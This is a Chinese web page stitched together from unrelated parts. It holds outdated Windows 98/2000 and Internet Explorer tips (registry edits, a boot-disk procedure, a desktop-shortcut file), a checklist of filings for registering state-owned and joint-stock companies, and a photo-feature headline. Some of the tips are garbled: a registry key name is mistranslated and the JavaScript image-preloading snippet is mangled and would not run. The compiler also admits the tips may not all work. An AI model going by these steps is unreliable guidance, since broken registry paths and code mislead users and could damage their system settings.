IE地址栏还有许多用法供大家使用:在地址栏里输入“."即可返回主页。键入“a:”或“C”,C:windows即可返回A盘或C盘。键入“\\局域网计算机名”就可登陆到该计算机的共享文件空间。键入“mailto:ss@163.net”就可以快速打开发邮件窗口。键入“telnet://bbs.szu.edu.cn”就可以登陆BBS系统。键入“ftp://sunrise.szu.edu.cn”就可以登陆FTP系统。 36.提高windows explore的刷新率? 当用户在“资源管理器”中增加或者删除了一个文件夹后,虽可通过按F5键查看最新刷新的结果。但是,每次这样做势必十分麻烦。通过修改注册表可以将刷新达到完全自动化。具体方法是:打开注册表编辑器,找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\更新分支,在更新子键中包含一个名叫更新Mode的键值名,将其键值由01改为00即可。 37.控制IE中“自动完成”的功能? 在IE中填写表格时,通常都会填写一些个人资料要下单购物或是加入会员,当填写到姓名、地址等常常要输入的表格时,IE就会发挥“自动完成”的功能,输入第一个字,后面的字就会自己出现或是以一个下拉列表让使用者选择。 利用注册表编辑器修改这个设定,可以改变自动完成的属性。运行regedit,进入注册表编辑器。找到“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete”,修改“Append Completion”为“yes”即可在输入第一个字时,自动将后面的文字补上。默认设置为“no”,当输入第一个字时,会以下拉菜单让使用者选择要以那些字补上。 38.修改我的收藏夹位置? 在windows目录中,有一个Favorites文件夹存放着“我的收藏”文件夹,如果要移动“我的收藏”,只要在IE关闭的状态下,打开资源管理器,对着“\WINDOWS\Favorites”文件夹按 Shift键,再用鼠标左键拖至您欲放置的目录中,就可以移动啦。 删除Windows 2000中可能用不到的全部驱动程序文件 Windows 2000的庞大目录结构,也使得系统所占的空间加大。若你细看,在\WINNT\driver cache\i386目录下,有一driver.cab的压缩文件,大小约52MB,主要是用来放置Windows 2000内置的全部驱动程序,用途是在我们新增设备时,Windows 2000可以自动地从这个压缩文件中提取出相应的驱动程序来进行安装,使用者无需再插入Windows 2000的光盘,若你已确定你的系统不会再变更系统设备时,就可以把driver.cab删除,省下50MB的空间挪做他用。 39.如何加快图片显示? 如何加快图片显示 如何加快图片显示速度一直是我们在设计网页时一个重要的考虑 因素,利用 java脚本 也能在一定程度上达到这一目的. 脚本 language= java脚本 !- image1= new image image1.src = 图片名称 image2 = new image image2.src = 图片名称 image3 = new image image3.src = 图片名称 // - /脚本 怎么样很是方便吧?这样浏览器在装载页面时就已经预先下载了3个图片(image1.gif,images2.gif和image3.gif).当激发onmouseover事件时. 40.巧做完整启动盘? 在安装WINDOWS时,系统会强烈建议你做一张启动盘。但你嫌麻烦,略过该步,如果你现在想做一张完整的启动盘,请把一张软盘插入驱动器。步骤如下:“开始->运行,键入‘C:\windows\command\bootdisk.bat’单击确定,则打开一个DOS窗口。如果是A盘请键入1,如果是B盘,请键入2。然后按任意键开始系统盘制作。制作完成,关闭DOS窗口,然后把C盘根目录下的msdos.sys复制到该软盘,即可。 41.如何修改文件的默认打开方式? 当遇到一个不知道如何打开的文件时,总喜欢用各种程序打开它,但如果忘记将“始终使用该程序打开这中类型的文件”左边的对号去掉,那末以后这类文件都用该程序打开,而不管是否有效。教你一个好方法:打开我的电脑,单击查看菜单中的“文件夹选项”选择“文件类型”,移动滑块在“已注册文件类型”窗口中找到该类型文件的扩展名,选中它,单击删除按钮,并在出现的提示中回答“是”,即可。 42.windows98中误删“显示桌面”功能后的恢复? 打开记事本,建立一个新文件,输入: [shell] command=2 iconfile=explorer.exe,3 [taskbar] Command=toggleDesktop 见文件保存为:“showDesktop.scf",路径为:C:\windows\Application Date\Microsoft\internet Explorer\Quick launch" 不需要重新启动,刷新一下就可以看到“显示桌面”按钮了。 43.控制IE中“自动完成”的功能? Internet选项->内容->自动完成 44.如何修改文件的默认打开方式? 选定文件,按住shift右键,或shift-F10, 就会有打开方式了,这时候再改也不迟 在网上搜集的,不一定全完好使,但也许对你有所帮助! |
爱的天国
(作者置顶)

(二)国有独资有限责任公司设立登记
(二)国有独资有限责任公司设立登记
1、公司董事长签署、出资人盖章的《公司设立登记申请书》(领取);
2、企业《(公司)申请登记委托书》(领取、出资人盖章),应标明具体委托事项和被委托人的权限;
3、公司章程(加盖出资人公章);
4、出资人为国家授权投资机构或者国家授权投资的部门的证明;
5、出资人的法人资格证明:
6、法定验资机构出具的验资报告;
7、出资人出具的董事长的任职文件;
8、出资人出具的董事、监事的任职文件;
9、经理的任职文件;
提交董事会的聘任决议由董事签字,董事成员兼任经理的还要提交出资人同意的文件。
10、公司董事、监事、经理身份证复印件;
11、住所使用证明:
自有房产提交产权证复印件;租赁房屋提交租赁协议原件或复印件以及出租方的产权证复印件;以上不能提供产权证复印件的,提交其它房屋产权使用证明复印件。
12、法律、行政法规规定设立有限责任公司必须报经审批的,提交有关部门的批准文件;
13、公司的经营范围中,属于法律、行政法规规定必须报经审批项目的,提交有关部门的批准文件、证书。
注:依照公司登记管理条例申请设立的国有独资有限责任公司适用本规范。
董事、经理及财务负责人不得兼任监事;
以上各项未注明提交复印件的一般均应提交原件;
提交复印件的,均应由出资人加盖公章并署明与原件一致。
(三)股份有限公司设立登记
1、公司董事长签署的《公司设立登记申请书》(领取);
2、企业(公司)申请登记委托书(领取,公司董事长签署),应标明具体委托事项和被委托人的权限;
3、国务院授权部门或者省、自治区、直辖市人民政府的批准文件,募集设立的股份有限公司还应提交国务院证券管理部门的批准文件;
4、创立大会的会议记录;
加盖发起人公章,或由出席会议的发起人的代理人签字(应附发起人对代理人的授权委托书原件)。
5、公司章程;
发起人以实物、工业产权、非专利技术和土地使用权出资的,应当就实物、工业产权、非专利技术和土地使用权所有权转移的方式、期限在章程中做出规定。
章程由发起人盖章或签字(自然人发起人)。
6、发起人的法人资格证明或者自然人身份证明;
发起人为企业法人的提交营业执照副本复印件;发起人为事业法人的事业法人登记证书复印件;发起人为社团法人的提交社团法人登记证复印件;发起人是民办非企业的提交民办非企业证书复印件;发起人是自然人的提交身份证复印件。
7、法定验资机构出具的验资报告;
8、法定验资机构出具的筹办公司的财务审计报告;
9、董事、监事的任职文件;
根据公司章程的规定和程序,提交创立大会决议。
创立大会决议应明确董事、监事的姓名,由发起人盖章或签字(自然人发起人)。
10、经理的任职文件;
提交董事会的聘任决议,由董事签字。
11、董事长的任职证明;
提交董事会决议,由董事签字;
12、公司董事、监事、经理身份证复印件;
13、《企业名称预先核准通知书》;
14、公司住所使用证明;
自有房产提交产权证复印件;租赁房屋提交租赁协议原件或复印件以及出租方的产权证复印件;以上不能提供产权证复印件的,提交其它房屋产权使用证明复印件。
15、公司经营范围中,属于法律、行政法规规定必须报经审批项目的提交有关部门的批准文件。
16、发起人是外商投资企业的,公司的经营范围属于鼓励或允许外商投资的领域的,外商投资企业发起人应提交:外商投资企业关于投资一致通过的董事会决议;外商投资企业的批准证书和营业执照复印件;法定验资机构出具的注册资本已经缴足的验资报告;外商投资企业经审计的资产负债表;外商投资企业缴纳所得税或减免所得税的证明;法律、行政法规及规章规定的其它材料。
发起人是外商投资企业的,公司的经营范围属于限制外商投资的领域的,除外商投资企业发起人应提交上述规定材料外:公司还应提交省级以上外经贸主管部门的批准文件。
董事、经理及财务负责人不得兼任监事;
以上各项未注明提交复印件的一般均应提交原件;
提交复印件的,均应由发起人加盖公章并署明与原件一致。
★★★★美得小心下巴砸到脚面!国家地理最佳照片特辑!★★★★


























